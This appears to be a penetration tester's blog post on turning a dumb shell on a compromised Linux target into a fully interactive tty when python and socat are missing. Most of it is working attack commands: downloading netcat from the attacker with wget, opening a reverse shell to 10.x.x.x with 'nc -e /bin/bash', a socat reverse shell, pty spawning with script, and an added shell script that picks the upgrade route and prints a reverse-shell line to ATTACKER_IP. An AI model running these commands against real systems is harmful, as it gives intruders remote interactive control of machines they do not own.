During a recent engagement, after exploiting an application into a non-interactive shell, the usual path of spawning a reverse shell and upgrading it to a full tty was needed.
The go-to tools for that (python, php, socat, ruby) were not available on the target, so the following steps were used to spawn the reverse shell and upgrade it to a tty:
First of all, if you do not wish to go through the hassle of the longer route below, simply type the following into the caught reverse shell (it runs on the target and allocates a pty there):
/usr/bin/script -qc /bin/bash /dev/null
Then press Ctrl+Z to background it and, on the attacking machine, execute:
stty raw -echo; fg; reset
This turns the dumb reverse shell into a proper tty on the target: su, tab completion and all other terminal based commands work. For those who need to jump through a couple more hoops because the above does not work 100% of the time, one of many ways is below.
Using wget on the target and Python's SimpleHTTPServer on the attacking machine, nc was easily moved over to the target. Two caveats: the copied nc must be a build that supports -e (nc.traditional or ncat; the OpenBSD netcat shipped by many distributions has no -e), and it must match the target's architecture and libc, so a statically linked build is the safer choice. Both the HTTP server and the listener use port 9998 here, so stop the HTTP server before starting the listener.
Attacking Machine: cp /usr/bin/nc .; python -m SimpleHTTPServer 9998
Target: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
Attacking Machine: nc -nlvp 9998
Target: ./nc 10.x.x.x 9998 -e /bin/bash
In order to upgrade our shell we first need a pty allocated on the target; the caught nc shell has none, which is why tab completion, job control and Ctrl+C do not work in it.
Normally I would default to trusty python and spawn a pty with:
python -c 'import pty; pty.spawn("/bin/bash")'
Or, instead of nc altogether, socat on both ends, which hands over a fully sane pty in one step:
Attacking Machine: socat file:`tty`,raw,echo=0 tcp-listen:9998
Target: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998
As neither of our preferred tools was available, we can fall back on a simpler and seemingly long forgotten way of upgrading, which is using script (it ships with util-linux, so it is present on almost every Linux system).
From the attacking machine, inside the caught nc reverse shell, type the following; it executes on the target and allocates a pty there:
Target (typed into the caught shell): /usr/bin/script -qc /bin/bash /dev/null
All that is left is to do the following:
A: CTRL + Z to background the shell
B: paste or type the following into the terminal on the attacking machine
stty raw -echo; fg; reset
The stty line puts the local terminal into raw mode so that Ctrl+C, tab and arrow keys are passed through to the remote bash instead of being handled locally; reset restores the local terminal once you exit the remote shell. If full screen programs such as vi or less render badly, run export TERM=xterm and stty rows <n> cols <m> in the upgraded shell to match your local terminal size.
Now you have a fully interactive shell with autocomplete and can continue to exploit the server, including su, sudo or local ssh commands on the target.
Granted there are many more ways to achieve the same shell, but using script seems to be overlooked quite often, hence the post.
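As an added example (not part of the original post), the following POSIX shell script automates the choice the post makes by hand: it probes the target's PATH for python3, python, socat and script in that order and prints the matching pty-spawn command, checks whether an uploaded nc binary actually advertises -e before it is relied on, and prints the stty rows/cols fix-up for the upgraded shell. ATTACKER_IP, port 9998 and the function names are placeholders of this example.

```shell
#!/bin/sh
# Added example, not from the original post: probe a target shell for the
# tools that can give us a proper pty and fall back to script when python
# and socat are missing. ATTACKER_IP / 9998 are placeholders.

# Print the pty-spawning command for the first tool found on PATH, in the
# order python3, python, socat, script. Exit status 1 when none is present,
# i.e. when we are stuck with a dumb reverse shell.
pick_pty_spawner() {
    if command -v python3 >/dev/null 2>&1; then
        printf '%s\n' "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif command -v python >/dev/null 2>&1; then
        printf '%s\n' "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif command -v socat >/dev/null 2>&1; then
        printf '%s\n' "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:9998"
    elif command -v script >/dev/null 2>&1; then
        printf '%s\n' "script -qc /bin/bash /dev/null"
    else
        return 1
    fi
}

# Return 0 if the netcat binary given as $1 advertises an -e/--exec option in
# its usage text (nc.traditional prints "-e prog", ncat prints "-e, --exec"),
# 1 otherwise (OpenBSD netcat lists no -e at all). Run this against a freshly
# uploaded ./nc before trusting "./nc host port -e /bin/bash".
nc_supports_exec() {
    "$1" -h 2>&1 | grep -Eq '(^|[[:space:]]|\[)-e([[:space:]]|,)'
}

# Print the "stty rows N cols M" line to run inside the upgraded shell so
# that full-screen programs draw correctly; reads the local terminal size.
# Exit status 1 when stdin is not a terminal (stty size fails).
local_size_fixup() {
    set -- $(stty size 2>/dev/null)
    [ "$#" -eq 2 ] || return 1
    printf 'stty rows %s cols %s\n' "$1" "$2"
}

main() {
    if cmd=$(pick_pty_spawner); then
        echo "run on target: $cmd"
    else
        echo "no pty spawner available; stay in the dumb shell"
    fi
    if nc_supports_exec nc; then
        echo "local nc supports -e"
    else
        echo "local nc lacks -e; upload nc.traditional or ncat instead"
    fi
    local_size_fixup || echo "not a terminal; skip the stty fix-up"
}

main
```

Run it on the target inside the caught shell to see which upgrade path is available; the -e check is the one that saves a wasted round trip when the uploaded nc turns out to be the OpenBSD flavour.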